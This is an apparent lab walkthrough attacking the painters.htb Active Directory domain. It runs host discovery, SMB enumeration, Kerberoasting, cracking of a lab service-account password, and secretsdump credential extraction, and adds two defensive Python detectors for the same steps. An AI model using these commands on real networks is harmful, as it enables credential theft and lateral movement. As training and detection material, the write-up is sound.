Ping Sweep

for i in {1..254};do (ping -c 1 192.168.110.$i | grep "bytes from" &);done
64 bytes from 192.168.110.1: icmp_seq=1 ttl=64 time=0.123 ms
64 bytes from 192.168.110.51: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 192.168.110.52: icmp_seq=1 ttl=128 time=0.390 ms
64 bytes from 192.168.110.53: icmp_seq=1 ttl=128 time=0.227 ms
64 bytes from 192.168.110.54: icmp_seq=1 ttl=128 time=0.340 ms
64 bytes from 192.168.110.55: icmp_seq=1 ttl=128 time=0.289 ms

CrackMapExec

SMB         192.168.110.55  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:painters.htb) (signing:True) (SMBv1:False)


SMB         192.168.110.52  445    PNT-SVRSVC       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRSVC) (domain:painters.htb) (signing:False) (SMBv1:False)


SMB         192.168.110.53  445    PNT-SVRBPA       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRBPA) (domain:painters.htb) (signing:False) (SMBv1:False)


SMB         192.168.110.54  5985   NONE             [*] None (name:192.168.110.54) (domain:None)

No usernames are known yet.

Tried SMB null authentication with crackmapexec.

rpcclient with login does give us some information.

SRVSVC .52


PORT    STATE SERVICE       REASON  VERSION
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

SRVBPA .53

PORT    STATE SERVICE       REASON  VERSION
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds? syn-ack
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Impacket with user creds

 
jay ~/Documents/zephyr took 421ms
 impacket-GetUserSPNs -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName   Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
---------------------  -------  --------  --------------------------  --------------------------  -----------
HTTP/svc.painters.htb  web_svc            2023-05-24 08:50:47.043365  2023-06-23 12:07:39.414564
HTTP/dc.painters.htb   blake              2023-06-23 08:34:15.398571  2023-06-23 13:21:25.195429  constrained

GetUserSPNs

We had the initial creds for the user riley, so the next step is to check NPUsers and UserSPNs.

 
 impacket-GetUserSPNs -dc-ip 192.168.110.55 'painters.htb/riley:P@ssw0rd' -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName   Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
---------------------  -------  --------  --------------------------  --------------------------  -----------
HTTP/svc.painters.htb  web_svc            2023-05-24 08:50:47.043365  2023-06-23 12:07:39.414564
HTTP/dc.painters.htb   blake              2023-06-23 08:34:15.398571  2023-06-23 13:21:25.195429  constrained
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$PAINTERS.HTB$painters.htb/web_svc*$ed75cc21807f3823378f1f6dc9fd2cb5$...
$krb5tgs$23$*blake$PAINTERS.HTB$painters.htb/blake*$c987caba1da39a5480c3329b15a842bd$...

Cracked

$krb5tgs$23$*web_svc$PAINTERS.HTB$painters.htb/web_svc*$ed75cc21807f3823378f1f6dc9fd2cb5$...:!QAZ1qaz
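
The `$krb5tgs$23$` prefix above means the tickets were issued with RC4-HMAC (etype 23), which a domain controller records as ticket encryption type 0x17 in Event ID 4769. A detection sketch over constructed events, added here and not part of the original notes; the record field names, the window and the threshold are assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # etype 23, the "$23$" in $krb5tgs$23$
WINDOW = timedelta(minutes=5)   # assumed correlation window
MIN_SERVICES = 2                # assumed threshold, tune per environment

# Constructed 4769-style records (simplified field names, not a real log).
EVENTS = [
    {"time": "2023-06-23T13:20:01", "user": "riley@PAINTERS.HTB", "service": "web_svc", "etype": "0x17", "ip": "192.0.2.10"},
    {"time": "2023-06-23T13:20:02", "user": "riley@PAINTERS.HTB", "service": "blake", "etype": "0x17", "ip": "192.0.2.10"},
    {"time": "2023-06-23T13:20:03", "user": "riley@PAINTERS.HTB", "service": "krbtgt", "etype": "0x17", "ip": "192.0.2.10"},
    {"time": "2023-06-23T13:25:40", "user": "alice@PAINTERS.HTB", "service": "web_svc", "etype": "0x12", "ip": "192.0.2.20"},
    {"time": "2023-06-23T13:25:41", "user": "alice@PAINTERS.HTB", "service": "PNT-SVRSVC$", "etype": "0x17", "ip": "192.0.2.20"},
]

def is_suspect(ev):
    """RC4 service ticket for a user-backed SPN (not a machine account or krbtgt)."""
    svc = ev["service"]
    return (int(ev["etype"], 16) == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def detect(events):
    """Map each requesting account to the SPN accounts it hit with RC4 inside WINDOW."""
    by_user = defaultdict(list)
    for ev in events:
        if is_suspect(ev):
            by_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for start, _ in reqs:
            svcs = {s for t, s in reqs if start <= t <= start + WINDOW}
            if len(svcs) >= MIN_SERVICES:
                alerts[user] = sorted(svcs)
                break
    return alerts

if __name__ == "__main__":
    for user, svcs in detect(EVENTS).items():
        print(f"possible Kerberoasting: {user} requested RC4 tickets for {svcs}")
```

Moving the SPN accounts to AES-only encryption types and long random passwords removes the weak point this rule watches for.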

As soon as I find creds, the first thing is to check which machines they have access to.

 crackmapexec smb 192.168.110.0/24 -u 'web_svc' -p '!QAZ1qaz'
SMB         192.168.110.53  445    PNT-SVRBPA       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRBPA) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.52  445    PNT-SVRSVC       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRSVC) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.55  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:painters.htb) (signing:True) (SMBv1:False)
SMB         192.168.110.53  445    PNT-SVRBPA       [+] painters.htb\web_svc:!QAZ1qaz
SMB         192.168.110.52  445    PNT-SVRSVC       [+] painters.htb\web_svc:!QAZ1qaz (Pwn3d!)
SMB         192.168.110.55  445    DC               [+] painters.htb\web_svc:!QAZ1qaz
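
The banner lines from the first crackmapexec run and the authentication lines above carry two reportable findings: hosts where SMB signing is not required, and accounts marked `(Pwn3d!)`, meaning local admin rights. A parser that turns this output into findings, added here and not part of the original notes; `parse` and `findings` are hypothetical helper names and the sample lines are copied from this page:

```python
import re

BANNER = re.compile(r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[\*\].*?"
                    r"\(signing:(?P<signing>True|False)\)")
AUTH = re.compile(r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[\+\]\s+(?P<account>[^:]+):")

# Lines taken from the output shown on this page (the 5985 line has no signing field).
SAMPLE = r"""
SMB         192.168.110.55  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:painters.htb) (signing:True) (SMBv1:False)
SMB         192.168.110.52  445    PNT-SVRSVC       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRSVC) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.53  445    PNT-SVRBPA       [*] Windows 10.0 Build 20348 x64 (name:PNT-SVRBPA) (domain:painters.htb) (signing:False) (SMBv1:False)
SMB         192.168.110.54  5985   NONE             [*] None (name:192.168.110.54) (domain:None)
SMB         192.168.110.53  445    PNT-SVRBPA       [+] painters.htb\web_svc:!QAZ1qaz
SMB         192.168.110.52  445    PNT-SVRSVC       [+] painters.htb\web_svc:!QAZ1qaz (Pwn3d!)
SMB         192.168.110.55  445    DC               [+] painters.htb\web_svc:!QAZ1qaz
"""

def parse(output):
    """Collect signing status and admin-capable accounts per host; passwords are not kept."""
    hosts = {}
    for raw in output.splitlines():
        line = raw.strip()
        m = BANNER.match(line)
        if m:
            entry = hosts.setdefault(m["host"], {"ip": m["ip"], "admin": []})
            entry["signing"] = m["signing"] == "True"
            continue
        m = AUTH.match(line)
        if m and m["host"] in hosts and line.endswith("(Pwn3d!)"):
            hosts[m["host"]]["admin"].append(m["account"])
    return hosts

def findings(hosts):
    """Return (host, finding) tuples sorted by host name."""
    out = []
    for name, h in sorted(hosts.items()):
        if not h["signing"]:
            out.append((name, "SMB signing not required (NTLM relay exposure)"))
        for acct in h["admin"]:
            out.append((name, f"{acct} has local admin rights"))
    return out

if __name__ == "__main__":
    for host, text in findings(parse(SAMPLE)):
        print(f"{host}: {text}")
```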

192.168.110.52 PNT-SVRSVC

 
 ~/Documents/zephyr proxychains impacket-secretsdump 'painters.htb/web_svc:!QAZ1qaz@192.168.110.52'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  192.168.110.52:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb131ea5c8206a94e3d32119d035961a9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
[*] DPAPI_SYSTEM 
[*] NL$KM 
[*] Cleaning up... 
[*] Stopping service RemoteRegistry